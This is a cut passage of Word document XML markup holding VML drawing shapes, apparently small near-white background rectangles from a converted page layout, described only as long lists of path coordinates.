048,2398,7048,2396,7048,2395,7048,2394,7048,2393,7048,2391,7048,2390,7048,2389,7048,2387,7048,2386,7048,2384,7048,2383,7048,2381,7048,2380,7048,2378,7048,2377,7048,2375,7048,2373,7048,2372,7048,2370,7048,2368,7048,2366,7048,2364,7048,2362,7048,2360,7048,2358,7048,2356,7048,2354,7048,2352,7048,2350,7048,2347,7048,2345,7048,2343,7048,2340,7048,2338,7048,2335,7048,2333,7048,2330,7048,2328,7048,2325,7048,2322,7048,2320,7048,2317,7048,2314,7048,2311,7048,2308,7048,2305,7048,2305,7048,2305,7048,2305,7048,2305,7048,2305,7048,2305,7048,2305,7048,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7047,2305,7046,2305,7046,2305,7046,2305,7046,2305,7045,2305,7045,2305,7045,2305,7045,2305,7044,2305,7044,2305,7043,2305,7043,2305,7043,2305,7042,2305,7042,2305,7041,2305,7040,2305,7040,2305,7039,2305,7039,2305,7038,2305,7037,2305,7036,2305,7036,2305,7035,2305,7034,2305,7033,2305,7032,2305,7031,2305,7030,2305,7029,2305,7027,2305,7026,2305,7025,2305,7024,2305,7022,2305,7021,2305,7020,2305,7018,2305,7016,2305,7015,2305,7013,2305,7011,2305,7010,2305,7008,2305,7006,2305,7004,2305,7002,2305,7000,2305,6998,2305,6996,2305,6993,2305,6991,2305,6989,2305,6986,2305,6984,2305,6981,2305,6978,2305,6976,2305,6973,2305,6970,2305,6967,2305,6964,2305,6961,2305,6958,2305,6955,2305,6951,2305,6948,2305,6944,2305,6941,2305,6937,2305,6933,2305,6930,2305,6926,2305,6922,2305,6918,2305,6914,2305,6909,2305,6905,2305,6901,2305,6896,2305,6892,2305,6887,2305,6882,2305,6877,2305,6872,2305,6867,2305,6862,2305,6857,2305,6851,2305,6846,2305,6840,2305,6835,2305,6829,2305,6823,2305,6817,2305,6811,2305,6805,2305,6799,2305,6792e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:338.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,6770" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:6770;width:130;height:270" coordorigin="2770,6770" coordsize="130,270" path="m2785,6792l2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2785,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2786,6792,2787,6792,2787,6792,2787,6792,2787,6792,2787,6792,2787,6792,2788,6792,2788,6792,2788,6792,2788,6792,2788,6792,2789,6792,2789,6792,2789,6792,2790,6792,2790,6792,2790,6792,2791,6792,2791,6792,2791,6792,2792,6792,2792,6792,2793,6792,2793,6792,2794,6792,2794,6792,2795,6792,2795,6792,2796,6792,2797,6792,2797,6792,2798,6792,2799,6792,2799,6792,2800,6792,2801,6792,2802,6792,2802,6792,2803,6792,2804,6792,2805,6792,2806,6792,2807,6792,2808,6792,2809,6792,2810,6792,2811,6792,2812,6792,2813,6792,2814,6792,2815,6792,2817,6792,2818,6792,2819,6792,2821,6792,2822,6792,2823,6792,2825,6792,2826,6792,2828,6792,2829,6792,2831,6792,2832,6792,2834,6792,2836,6792,2837,6792,2839,6792,2841,6792,2843,6792,2845,6792,2846,6792,2848,6792,2850,6792,2852,6792,2855,6792,2857,6792,2859,6792,2861,6792,2863,6792,2866,6792,2868,6792,2870,6792,2873,6792,2875,6792,2878,6792,2880,6792,2883,6792,2885,6792,2888,6792,2891,6792,2894,6792,2897,6792,2900,6792,2902,6792,2905,6792,2905,6792,2905,6792,2905,6792,2905,6792,2905,6792,2905,6792,2905,6792,2905,6792,2905,6792,2905,6793,2905,6793,2905,6793,2905,6793,2905,6793,2905,6793,2905,6793,2905,6793,2905,6793,2905,6793,2905,6793,2905,6794,2905,6794,2905,6794,2905,6794,2905,6795,2905,6795,2905,6795,2905,6795,2905,6796,2905,6796,2905,6797,2905,6797,2905,6797,2905,6798,2905,6798,2905,6799,2905,6799,2905,6800,2905,6801,2905,6801,2905,6802,2905,6803,2905,6804,2905,6804,2905,6805,2905,6806,2905,6807,2905,6808,2905,6809,2905,6810,2905,6811,2905,6813,2905,6814,2905,6815,2905,6816,2905,6818,2905,6819,2905,6820,2905,6822,2905,6824,2905,6825,2905,6827,2905,6829,2905,6830,2905,6832,2905,6834,2905,6836,2905,6838,2905,6840,2905,6842,2905,6844,2905,6847,2905,6849,2905,6851,2905,6854,2905,6856,2905,6859,2905,6862,2905,6864,2905,6867,2905,6870,2905,6873,2905,6876,2905,6879,2905,6882,2905,6885,2905,6889,2905,6892,2905,6896,2905,6899,2905,6903,2905,6907,2905,6910,2905,6914,2905,6918,2905,6922,2905,6926,2905,6931,2905,6935,2905,6939,2905,6944,2905,6948,2905,6953,2905,6958,2905,6963,2905,6968,2905,6973,2905,6978,2905,6983,2905,6988,2905,6994,2905,6999,2905,7005,2905,7011,2905,7017,2905,7023,2905,7029,2905,7035,2905,7041,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2905,7048,2904,7048,2904,7048,2904,7048,2904,7048,2904,7048,2904,7048,2904,7048,2903,7048,2903,7048,2903,7048,2903,7048,2902,7048,2902,7048,2902,7048,2902,7048,2901,7048,2901,7048,2901,7048,2900,7048,2900,7048,2899,7048,2899,7048,2899,7048,2898,7048,2898,7048,2897,7048,2897,7048,2896,7048,2895,7048,2895,7048,2894,7048,2894,7048,2893,7048,2892,7048,2892,7048,2891,7048,2890,7048,2889,7048,2888,7048,2888,7048,2887,7048,2886,7048,2885,7048,2884,7048,2883,7048,2882,7048,2881,7048,2880,7048,2879,7048,2878,7048,2877,7048,2875,7048,2874,7048,2873,7048,2872,7048,2870,7048,2869,7048,2868,7048,2866,7048,2865,7048,2863,7048,2862,7048,2860,7048,2859,7048,2857,7048,2855,7048,2854,7048,2852,7048,2850,7048,2848,7048,2846,7048,2844,7048,2842,7048,2840,7048,2838,7048,2836,7048,2834,7048,2832,7048,2830,7048,2828,7048,2825,7048,2823,7048,2821,7048,2818,7048,2816,7048,2813,7048,2811,7048,2808,7048,2805,7048,2803,7048,2800,7048,2797,7048,2794,7048,2791,7048,2788,7048,2785,7048,2785,7048,2785,7048,2785,7048,2785,7048,2785,7048,2785,7048,2785,7048,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7047,2785,7046,2785,7046,2785,7046,2785,7046,2785,7045,2785,7045,2785,7045,2785,7045,2785,7044,2785,7044,2785,7043,2785,7043,2785,7043,2785,7042,2785,7042,2785,7041,2785,7040,2785,7040,2785,7039,2785,7039,2785,7038,2785,7037,2785,7036,2785,7036,2785,7035,2785,7034,2785,7033,2785,7032,2785,7031,2785,7030,2785,7029,2785,7027,2785,7026,2785,7025,2785,7024,2785,7022,2785,7021,2785,7020,2785,7018,2785,7016,2785,7015,2785,7013,2785,7011,2785,7010,2785,7008,2785,7006,2785,7004,2785,7002,2785,7000,2785,6998,2785,6996,2785,6993,2785,6991,2785,6989,2785,6986,2785,6984,2785,6981,2785,6978,2785,6976,2785,6973,2785,6970,2785,6967,2785,6964,2785,6961,2785,6958,2785,6955,2785,6951,2785,6948,2785,6944,2785,6941,2785,6937,2785,6933,2785,6930,2785,6926,2785,6922,2785,6918,2785,6914,2785,6909,2785,6905,2785,6901,2785,6896,2785,6892,2785,6887,2785,6882,2785,6877,2785,6872,2785,6867,2785,6862,2785,6857,2785,6851,2785,6846,2785,6840,2785,6835,2785,6829,2785,6823,2785,6817,2785,6811,2785,6805,2785,6799,2785,6792e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:370.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,7410" coordsize="130,250">
        <v:shape style="position:absolute;left:2290;top:7410;width:130;height:250" coordorigin="2290,7410" coordsize="130,250" path="m2305,7423l2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2305,7423,2306,7423,2306,7423,2306,7423,2306,7423,2306,7423,2306,7423,2306,7423,2306,7423,2306,7423,2306,7423,2307,7423,2307,7423,2307,7423,2307,7423,2307,7423,2307,7423,2308,7423,2308,7423,2308,7423,2308,7423,2309,7423,2309,7423,2309,7423,2310,7423,2310,7423,2310,7423,2311,7423,2311,7423,2312,7423,2312,7423,2313,7423,2313,7423,2314,7423,2314,7423,2315,7423,2315,7423,2316,7423,2316,7423,2317,7423,2318,7423,2318,7423,2319,7423,2320,7423,2321,7423,2321,7423,2322,7423,2323,7423,2324,7423,2325,7423,2326,7423,2327,7423,2328,7423,2329,7423,2330,7423,2331,7423,2332,7423,2333,7423,2334,7423,2335,7423,2336,7423,2338,7423,2339,7423,2340,7423,2342,7423,2343,7423,2344,7423,2346,7423,2347,7423,2349,7423,2350,7423,2352,7423,2354,7423,2355,7423,2357,7423,2359,7423,2361,7423,2362,7423,2364,7423,2366,7423,2368,7423,2370,7423,2372,7423,2374,7423,2376,7423,2379,7423,2381,7423,2383,7423,2385,7423,2388,7423,2390,7423,2392,7423,2395,7423,2397,7423,2400,7423,2403,7423,2405,7423,2408,7423,2411,7423,2414,7423,2416,7423,2419,7423,2422,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7423,2425,7424,2425,7424,2425,7424,2425,7424,2425,7424,2425,7425,2425,7425,2425,7425,2425,7425,2425,7426,2425,7426,2425,7426,2425,7427,2425,7427,2425,7428,2425,7428,2425,7429,2425,7429,2425,7430,2425,7430,2425,7431,2425,7432,2425,7432,2425,7433,2425,7434,2425,7435,2425,7436,2425,7437,2425,7437,2425,7438,2425,7439,2425,7441,2425,7442,2425,7443,2425,7444,2425,7445,2425,7447,2425,7448,2425,7449,2425,7451,2425,7452,2425,7454,2425,7455,2425,7457,2425,7459,2425,7461,2425,7462,2425,7464,2425,7466,2425,7468,2425,7470,2425,7472,2425,7475,2425,7477,2425,7479,2425,7482,2425,7484,2425,7487,2425,7489,2425,7492,2425,7495,2425,7497,2425,7500,2425,7503,2425,7506,2425,7509,2425,7512,2425,7516,2425,7519,2425,7522,2425,7526,2425,7529,2425,7533,2425,7537,2425,7541,2425,7545,2425,7548,2425,7553,2425,7557,2425,7561,2425,7565,2425,7570,2425,7574,2425,7579,2425,7583,2425,7588,2425,7593,2425,7598,2425,7603,2425,7608,2425,7613,2425,7619,2425,7624,2425,7630,2425,7635,2425,7641,2425,7647,2425,7653,2425,7659,2425,7665,2425,7671,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2425,7678,2424,7678,2424,7678,2424,7678,2424,7678,2424,7678,2424,7678,2424,7678,2423,7678,2423,7678,2423,7678,2423,7678,2423,7678,2422,7678,2422,7678,2422,7678,2422,7678,2421,7678,2421,7678,2421,7678,2420,7678,2420,7678,2420,7678,2419,7678,2419,7678,2418,7678,2418,7678,2417,7678,2417,7678,2416,7678,2416,7678,2415,7678,2415,7678,2414,7678,2413,7678,2413,7678,2412,7678,2411,7678,2411,7678,2410,7678,2409,7678,2408,7678,2407,7678,2407,7678,2406,7678,2405,7678,2404,7678,2403,7678,2402,7678,2401,7678,2400,7678,2399,7678,2398,7678,2396,7678,2395,7678,2394,7678,2393,7678,2391,7678,2390,7678,2389,7678,2387,7678,2386,7678,2384,7678,2383,7678,2381,7678,2380,7678,2378,7678,2377,7678,2375,7678,2373,7678,2372,7678,2370,7678,2368,7678,2366,7678,2364,7678,2362,7678,2360,7678,2358,7678,2356,7678,2354,7678,2352,7678,2350,7678,2347,7678,2345,7678,2343,7678,2340,7678,2338,7678,2335,7678,2333,7678,2330,7678,2328,7678,2325,7678,2322,7678,2320,7678,2317,7678,2314,7678,2311,7678,2308,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7678,2305,7677,2305,7677,2305,7677,2305,7677,2305,7677,2305,7677,2305,7677,2305,7676,2305,7676,2305,7676,2305,7676,2305,7676,2305,7675,2305,7675,2305,7675,2305,7674,2305,7674,2305,7673,2305,7673,2305,7672,2305,7672,2305,7671,2305,7671,2305,7670,2305,7670,2305,7669,2305,7668,2305,7667,2305,7667,2305,7666,2305,7665,2305,7664,2305,7663,2305,7662,2305,7661,2305,7660,2305,7659,2305,7658,2305,7657,2305,7655,2305,7654,2305,7653,2305,7651,2305,7650,2305,7648,2305,7647,2305,7645,2305,7644,2305,7642,2305,7640,2305,7638,2305,7636,2305,7634,2305,7632,2305,7630,2305,7628,2305,7626,2305,7624,2305,7621,2305,7619,2305,7617,2305,7614,2305,7611,2305,7609,2305,7606,2305,7603,2305,7600,2305,7597,2305,7594,2305,7591,2305,7588,2305,7585,2305,7582,2305,7578,2305,7575,2305,7571,2305,7567,2305,7564,2305,7560,2305,7556,2305,7552,2305,7548,2305,7544,2305,7540,2305,7535,2305,7531,2305,7526,2305,7522,2305,7517,2305,7512,2305,7508,2305,7503,2305,7498,2305,7492,2305,7487,2305,7482,2305,7476,2305,7471,2305,7465,2305,7459,2305,7454,2305,7448,2305,7442,2305,7435,2305,7429,2305,7423e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:370.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,7410" coordsize="130,250">
        <v:shape style="position:absolute;left:2770;top:7410;width:130;height:250" coordorigin="2770,7410" coordsize="130,250" path="m2785,7423l2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2785,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2786,7423,2787,7423,2787,7423,2787,7423,2787,7423,2787,7423,2787,7423,2788,7423,2788,7423,2788,7423,2788,7423,2788,7423,2789,7423,2789,7423,2789,7423,2790,7423,2790,7423,2790,7423,2791,7423,2791,7423,2791,7423,2792,7423,2792,7423,2793,7423,2793,7423,2794,7423,2794,7423,2795,7423,2795,7423,2796,7423,2797,7423,2797,7423,2798,7423,2799,7423,2799,7423,2800,7423,2801,7423,2802,7423,2802,7423,2803,7423,2804,7423,2805,7423,2806,7423,2807,7423,2808,7423,2809,7423,2810,7423,2811,7423,2812,7423,2813,7423,2814,7423,2815,7423,2817,7423,2818,7423,2819,7423,2821,7423,2822,7423,2823,7423,2825,7423,2826,7423,2828,7423,2829,7423,2831,7423,2832,7423,2834,7423,2836,7423,2837,7423,2839,7423,2841,7423,2843,7423,2845,7423,2846,7423,2848,7423,2850,7423,2852,7423,2855,7423,2857,7423,2859,7423,2861,7423,2863,7423,2866,7423,2868,7423,2870,7423,2873,7423,2875,7423,2878,7423,2880,7423,2883,7423,2885,7423,2888,7423,2891,7423,2894,7423,2897,7423,2900,7423,2902,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7423,2905,7424,2905,7424,2905,7424,2905,7424,2905,7424,2905,7425,2905,7425,2905,7425,2905,7425,2905,7426,2905,7426,2905,7426,2905,7427,2905,7427,2905,7428,2905,7428,2905,7429,2905,7429,2905,7430,2905,7430,2905,7431,2905,7432,2905,7432,2905,7433,2905,7434,2905,7435,2905,7436,2905,7437,2905,7437,2905,7438,2905,7439,2905,7441,2905,7442,2905,7443,2905,7444,2905,7445,2905,7447,2905,7448,2905,7449,2905,7451,2905,7452,2905,7454,2905,7455,2905,7457,2905,7459,2905,7461,2905,7462,2905,7464,2905,7466,2905,7468,2905,7470,2905,7472,2905,7475,2905,7477,2905,7479,2905,7482,2905,7484,2905,7487,2905,7489,2905,7492,2905,7495,2905,7497,2905,7500,2905,7503,2905,7506,2905,7509,2905,7512,2905,7516,2905,7519,2905,7522,2905,7526,2905,7529,2905,7533,2905,7537,2905,7541,2905,7545,2905,7548,2905,7553,2905,7557,2905,7561,2905,7565,2905,7570,2905,7574,2905,7579,2905,7583,2905,7588,2905,7593,2905,7598,2905,7603,2905,7608,2905,7613,2905,7619,2905,7624,2905,7630,2905,7635,2905,7641,2905,7647,2905,7653,2905,7659,2905,7665,2905,7671,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2905,7678,2904,7678,2904,7678,2904,7678,2904,7678,2904,7678,2904,7678,2904,7678,2903,7678,2903,7678,2903,7678,2903,7678,2902,7678,2902,7678,2902,7678,2902,7678,2901,7678,2901,7678,2901,7678,2900,7678,2900,7678,2899,7678,2899,7678,2899,7678,2898,7678,2898,7678,2897,7678,2897,7678,2896,7678,2895,7678,2895,7678,2894,7678,2894,7678,2893,7678,2892,7678,2892,7678,2891,7678,2890,7678,2889,7678,2888,7678,2888,7678,2887,7678,2886,7678,2885,7678,2884,7678,2883,7678,2882,7678,2881,7678,2880,7678,2879,7678,2878,7678,2877,7678,2875,7678,2874,7678,2873,7678,2872,7678,2870,7678,2869,7678,2868,7678,2866,7678,2865,7678,2863,7678,2862,7678,2860,7678,2859,7678,2857,7678,2855,7678,2854,7678,2852,7678,2850,7678,2848,7678,2846,7678,2844,7678,2842,7678,2840,7678,2838,7678,2836,7678,2834,7678,2832,7678,2830,7678,2828,7678,2825,7678,2823,7678,2821,7678,2818,7678,2816,7678,2813,7678,2811,7678,2808,7678,2805,7678,2803,7678,2800,7678,2797,7678,2794,7678,2791,7678,2788,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7678,2785,7677,2785,7677,2785,7677,2785,7677,2785,7677,2785,7677,2785,7677,2785,7676,2785,7676,2785,7676,2785,7676,2785,7676,2785,7675,2785,7675,2785,7675,2785,7674,2785,7674,2785,7673,2785,7673,2785,7672,2785,7672,2785,7671,2785,7671,2785,7670,2785,7670,2785,7669,2785,7668,2785,7667,2785,7667,2785,7666,2785,7665,2785,7664,2785,7663,2785,7662,2785,7661,2785,7660,2785,7659,2785,7658,2785,7657,2785,7655,2785,7654,2785,7653,2785,7651,2785,7650,2785,7648,2785,7647,2785,7645,2785,7644,2785,7642,2785,7640,2785,7638,2785,7636,2785,7634,2785,7632,2785,7630,2785,7628,2785,7626,2785,7624,2785,7621,2785,7619,2785,7617,2785,7614,2785,7611,2785,7609,2785,7606,2785,7603,2785,7600,2785,7597,2785,7594,2785,7591,2785,7588,2785,7585,2785,7582,2785,7578,2785,7575,2785,7571,2785,7567,2785,7564,2785,7560,2785,7556,2785,7552,2785,7548,2785,7544,2785,7540,2785,7535,2785,7531,2785,7526,2785,7522,2785,7517,2785,7512,2785,7508,2785,7503,2785,7498,2785,7492,2785,7487,2785,7482,2785,7476,2785,7471,2785,7465,2785,7459,2785,7454,2785,7448,2785,7442,2785,7435,2785,7429,2785,7423e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:402.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,8050" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:8050;width:130;height:270" coordorigin="2290,8050" coordsize="130,270" path="m2305,8068l2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2305,8068,2306,8068,2306,8068,2306,8068,2306,8068,2306,8068,2306,8068,2306,8068,2306,8068,2306,8068,2306,8068,2307,8068,2307,8068,2307,8068,2307,8068,2307,8068,2307,8068,2308,8068,2308,8068,2308,8068,2308,8068,2309,8068,2309,8068,2309,8068,2310,8068,2310,8068,2310,8068,2311,8068,2311,8068,2312,8068,2312,8068,2313,8068,2313,8068,2314,8068,2314,8068,2315,8068,2315,8068,2316,8068,2316,8068,2317,8068,2318,8068,2318,8068,2319,8068,2320,8068,2321,8068,2321,8068,2322,8068,2323,8068,2324,8068,2325,8068,2326,8068,2327,8068,2328,8068,2329,8068,2330,8068,2331,8068,2332,8068,2333,8068,2334,8068,2335,8068,2336,8068,2338,8068,2339,8068,2340,8068,2342,8068,2343,8068,2344,8068,2346,8068,2347,8068,2349,8068,2350,8068,2352,8068,2354,8068,2355,8068,2357,8068,2359,8068,2361,8068,2362,8068,2364,8068,2366,8068,2368,8068,2370,8068,2372,8068,2374,8068,2376,8068,2379,8068,2381,8068,2383,8068,2385,8068,2388,8068,2390,8068,2392,8068,2395,8068,2397,8068,2400,8068,2403,8068,2405,8068,2408,8068,2411,8068,2414,8068,2416,8068,2419,8068,2422,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8068,2425,8069,2425,8069,2425,8069,2425,8069,2425,8069,2425,8069,2425,8069,2425,8070,2425,8070,2425,8070,2425,8070,2425,8071,2425,8071,2425,8071,2425,8072,2425,8072,2425,8073,2425,8073,2425,8074,2425,8074,2425,8075,2425,8075,2425,8076,2425,8076,2425,8077,2425,8078,2425,8078,2425,8079,2425,8080,2425,8081,2425,8082,2425,8083,2425,8084,2425,8085,2425,8086,2425,8087,2425,8088,2425,8089,2425,8091,2425,8092,2425,8093,2425,8095,2425,8096,2425,8098,2425,8099,2425,8101,2425,8102,2425,8104,2425,8106,2425,8108,2425,8110,2425,8112,2425,8114,2425,8116,2425,8118,2425,8120,2425,8122,2425,8125,2425,8127,2425,8129,2425,8132,2425,8135,2425,8137,2425,8140,2425,8143,2425,8146,2425,8149,2425,8152,2425,8155,2425,8158,2425,8161,2425,8164,2425,8168,2425,8171,2425,8175,2425,8178,2425,8182,2425,8186,2425,8190,2425,8194,2425,8198,2425,8202,2425,8206,2425,8211,2425,8215,2425,8219,2425,8224,2425,8229,2425,8234,2425,8238,2425,8243,2425,8248,2425,8254,2425,8259,2425,8264,2425,8270,2425,8275,2425,8281,2425,8287,2425,8292,2425,8298,2425,8304,2425,8311,2425,8317,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2425,8323,2424,8323,2424,8323,2424,8323,2424,8323,2424,8323,2424,8323,2424,8323,2423,8323,2423,8323,2423,8323,2423,8323,2423,8323,2422,8323,2422,8323,2422,8323,2422,8323,2421,8323,2421,8323,2421,8323,2420,8323,2420,8323,2420,8323,2419,8323,2419,8323,2418,8323,2418,8323,2417,8323,2417,8323,2416,8323,2416,8323,2415,8323,2415,8323,2414,8323,2413,8323,2413,8323,2412,8323,2411,8323,2411,8323,2410,8323,2409,8323,2408,8323,2407,8323,2407,8323,2406,8323,2405,8323,2404,8323,2403,8323,2402,8323,2401,8323,2400,8323,2399,8323,2398,8323,2396,8323,2395,8323,2394,8323,2393,8323,2391,8323,2390,8323,2389,8323,2387,8323,2386,8323,2384,8323,2383,8323,2381,8323,2380,8323,2378,8323,2377,8323,2375,8323,2373,8323,2372,8323,2370,8323,2368,8323,2366,8323,2364,8323,2362,8323,2360,8323,2358,8323,2356,8323,2354,8323,2352,8323,2350,8323,2347,8323,2345,8323,2343,8323,2340,8323,2338,8323,2335,8323,2333,8323,2330,8323,2328,8323,2325,8323,2322,8323,2320,8323,2317,8323,2314,8323,2311,8323,2308,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8323,2305,8322,2305,8322,2305,8322,2305,8322,2305,8322,2305,8322,2305,8321,2305,8321,2305,8321,2305,8321,2305,8320,2305,8320,2305,8320,2305,8319,2305,8319,2305,8318,2305,8318,2305,8317,2305,8317,2305,8316,2305,8316,2305,8315,2305,8314,2305,8314,2305,8313,2305,8312,2305,8311,2305,8310,2305,8309,2305,8308,2305,8307,2305,8306,2305,8305,2305,8304,2305,8303,2305,8302,2305,8301,2305,8299,2305,8298,2305,8297,2305,8295,2305,8294,2305,8292,2305,8290,2305,8289,2305,8287,2305,8285,2305,8284,2305,8282,2305,8280,2305,8278,2305,8276,2305,8273,2305,8271,2305,8269,2305,8267,2305,8264,2305,8262,2305,8259,2305,8257,2305,8254,2305,8251,2305,8249,2305,8246,2305,8243,2305,8240,2305,8237,2305,8233,2305,8230,2305,8227,2305,8223,2305,8220,2305,8216,2305,8213,2305,8209,2305,8205,2305,8201,2305,8197,2305,8193,2305,8189,2305,8185,2305,8181,2305,8176,2305,8172,2305,8167,2305,8163,2305,8158,2305,8153,2305,8148,2305,8143,2305,8138,2305,8132,2305,8127,2305,8122,2305,8116,2305,8110,2305,8105,2305,8099,2305,8093,2305,8087,2305,8081,2305,8074,2305,8068e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:402.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,8050" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:8050;width:130;height:270" coordorigin="2770,8050" coordsize="130,270" path="m2785,8068l2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2785,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2786,8068,2787,8068,2787,8068,2787,8068,2787,8068,2787,8068,2787,8068,2788,8068,2788,8068,2788,8068,2788,8068,2788,8068,2789,8068,2789,8068,2789,8068,2790,8068,2790,8068,2790,8068,2791,8068,2791,8068,2791,8068,2792,8068,2792,8068,2793,8068,2793,8068,2794,8068,2794,8068,2795,8068,2795,8068,2796,8068,2797,8068,2797,8068,2798,8068,2799,8068,2799,8068,2800,8068,2801,8068,2802,8068,2802,8068,2803,8068,2804,8068,2805,8068,2806,8068,2807,8068,2808,8068,2809,8068,2810,8068,2811,8068,2812,8068,2813,8068,2814,8068,2815,8068,2817,8068,2818,8068,2819,8068,2821,8068,2822,8068,2823,8068,2825,8068,2826,8068,2828,8068,2829,8068,2831,8068,2832,8068,2834,8068,2836,8068,2837,8068,2839,8068,2841,8068,2843,8068,2845,8068,2846,8068,2848,8068,2850,8068,2852,8068,2855,8068,2857,8068,2859,8068,2861,8068,2863,8068,2866,8068,2868,8068,2870,8068,2873,8068,2875,8068,2878,8068,2880,8068,2883,8068,2885,8068,2888,8068,2891,8068,2894,8068,2897,8068,2900,8068,2902,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8068,2905,8069,2905,8069,2905,8069,2905,8069,2905,8069,2905,8069,2905,8069,2905,8070,2905,8070,2905,8070,2905,8070,2905,8071,2905,8071,2905,8071,2905,8072,2905,8072,2905,8073,2905,8073,2905,8074,2905,8074,2905,8075,2905,8075,2905,8076,2905,8076,2905,8077,2905,8078,2905,8078,2905,8079,2905,8080,2905,8081,2905,8082,2905,8083,2905,8084,2905,8085,2905,8086,2905,8087,2905,8088,2905,8089,2905,8091,2905,8092,2905,8093,2905,8095,2905,8096,2905,8098,2905,8099,2905,8101,2905,8102,2905,8104,2905,8106,2905,8108,2905,8110,2905,8112,2905,8114,2905,8116,2905,8118,2905,8120,2905,8122,2905,8125,2905,8127,2905,8129,2905,8132,2905,8135,2905,8137,2905,8140,2905,8143,2905,8146,2905,8149,2905,8152,2905,8155,2905,8158,2905,8161,2905,8164,2905,8168,2905,8171,2905,8175,2905,8178,2905,8182,2905,8186,2905,8190,2905